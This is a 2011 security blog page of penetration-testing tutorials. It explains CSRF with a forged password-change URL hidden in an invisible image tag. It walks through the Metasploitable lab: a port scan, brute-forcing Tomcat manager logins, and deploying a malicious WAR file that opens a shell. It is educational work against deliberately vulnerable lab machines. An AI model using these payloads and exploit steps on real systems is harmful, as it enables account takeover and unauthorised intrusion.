Cross Site Request Forgery (CSRF) Overview

 Web  645 Responses »
Oct 312011
 

Cross Site Request Forgery is a web-based vulnerability by which an attacker can send unauthorized commands to a site, via an authenticated user. This attack forces the user to unwittingly send commands to the website by embedding malicious URLs into HTML code that the target then execute, such as clicking a hyperlink or viewing an image referencing the URL. Since the request comes from the authenticated user it can be very difficult to determine when a CSRF attack has occured.

Consider the following HTTP header code (borrowed from DVWA):

GET /dvwa/vulnerabilities/csrf/?password_new=mynewpasswd&password_conf=mynewpasswd&Change=Change HTTP/1.1

This shows the parameters sent to the website in order to perform a password change on an account. Since we know what variables are required to be sent in the URL from the request above, it is possible to construct a custom URL in order to change the password, for example:

www.example.com/dvwa/vulnerabilities/csrf/?password_new=expl0ited&password_conf=expl0ited&Change=Change

Now that we have the URL, we need to get the admin to “launch” it. This is where CSRF comes into it’s own as a stealth attack, since the target does not need to explicitly click a link in order for them to execute this code, the URL can be easily hidden deep within some HTML code such as an image:

<img src="http://www.example.com/dvwa/vulnerabilities/csrf/?password_new=abcd&password_conf=abcd&Change=Change" alt="" width="1" height="1" border="0" />

Images are preferable to using hyperlinks, since the hyperlink will then redirect the user to the CSRF page, where they will see a change has occured (such as a confirmation page of password change). By embedding the link as a zero-byte image, the malicious URL is still submitted to the website upon viewing the malicious website/email, however no visual indicator is then displayed to recognise that the action has taken place.

There are however caveats to this method, including:
- The target needs to be logged-in to the site in order for the attack to work
- The site mustn’t check the HTTP referrer header (a CSRF attack will not have a correct referrer since the request did not originate from the actual website)
- The target must be lured into executing the malicious URL

While it is assumed that only HTTP GET requests are vulnerable to CSRF, as only this allows the malicious URL to be constructed, there are tools to perform CSRF attacks for HTTP POST requests. For example, the CSRF Redirector  can be used to forge HTTP POST requests. Another converter can be found here.

 Posted by admin at 11:23 am

Metasploitable: Tomcat exploit

 Metasploit  8 Responses »
Oct 272011
 

One of the simplest attacks to perform against the Metasploitable VM is against the Tomcat installation. This has been setup with weak credentials (Tomcat:Tomcat) and as such can be easily brute-forced/exploited.

The Metasploit scanner module tomcat_mrg_login can be ran against your host, this will only take a few guesses to come across the correct login.

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.0.33:8180 – Trying username:’tomcat’ with password:’role1′
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] 10.0.0.33:8180 – Trying username:’tomcat’ with password:’root’
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] 10.0.0.33:8180 – Trying username:’tomcat’ with password:’tomcat’
[+] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’
[*] 10.0.0.33:8180 – Trying username:’both’ with password:’admin’

Now that we have the credentials, it is possible to perform an exploit through the Tomcat manager. jduck’s Tomcat Manager Application Deployer (tomcat_mgr_deploy) deploys a WAR file containing a malicious JSP application that is then executed on the server. This can be used in conjunction with reverse shell payloads for example, to spawn a session on the server.

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target…
[*] Automatically selected target “Linux X86″
[*] Uploading 1612 bytes as HJpy1H.war …
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp…
[*] Undeploying HJpy1H …
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.0.11:39497 -> 10.0.0.33:4444) at 2010-05-19 11:53:12 -0500

 We now have access to the Metasploitable host as the Tomcat user.
 
tomcat_mgr_deploy overview

 Posted by admin at 11:43 am

Metasploitable: Port scanning

 Metasploit  7 Responses »
Oct 262011
 

In order to be able to successfully penetrate this system, we need to identify what the system is we are dealing with. The first thing to do would be to perform a port scan, this will help identify what ports the system has open. With the right tool and parameters it is also possible to find out what is behind each port, and even what software version the software is at. It is important to know this information, since vulnerabilities can change, appear or disappear between versions of the same software package.

[important]If you are using VMWare, setup each VM to use NAT networking to ensure they have separate IPs[/important]

I am using nmap to perform the port scan of the host, since I am lazy/not concerned with stealth I am going to use the -A switch to enable OS and version detection in one go.

[warning]You will need to know the IP of the Metasploitable VM in order to port scan it. Run ifconfig command to gather this[/warning]

nmap -A 192.168.9.129
-- SNIP --
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: {hu6HJzG5pXF7!>UoP"V
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:17:D7:24 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux
-- SNIP --

As you can be seen from the output the scan has provided us with plenty of information. We now know what services are running, on what port and what version. From here it is possible to go forth in Metasploit and begin searching for related exploits to launch against the target host.

 Posted by admin at 6:32 pm

Metasploitable: An introduction

 Metasploit  7 Responses »
Oct 262011
 

Whilst looking for a way to try and sharpen my penetration testing skills, I came across “Metasploitable”. This is an Ubuntu 8.04 distribution serverd up as a VMware appliance and is packed with out-of-date and vulnerable software that can be exploited including:

  • Apache Tomcat 5.5 (with weak credentials)
  • Apache JServ
  • MySQL 5.0.51a-3ubuntu5
  • PostgreSQL DB 8.3.x
  • Postfix SMTPd
  • ProFTPD 1.3.1
  • Distcc
  • Tikiwiki
  • Twiki

And much more..

You can download a torrent of this from here or as a direct HTTP download from the customer centre here

Source: Metasploit Blog

 Posted by admin at 2:47 pm

Beginnings..

 Uncategorized  518 Responses »
Oct 012011
 

Welcome to Eithernet, I place which (I hope) will soon be filled with various tutorials and articles relating to networking, security and penetration testing topics. I have set this up to help record the knowledge I have gained along my journey into this field, that I wish to share with a wider audience.

 Posted by admin at 12:46 pm
© 2011 Eithernet Suffusion theme by Sayontan Sinha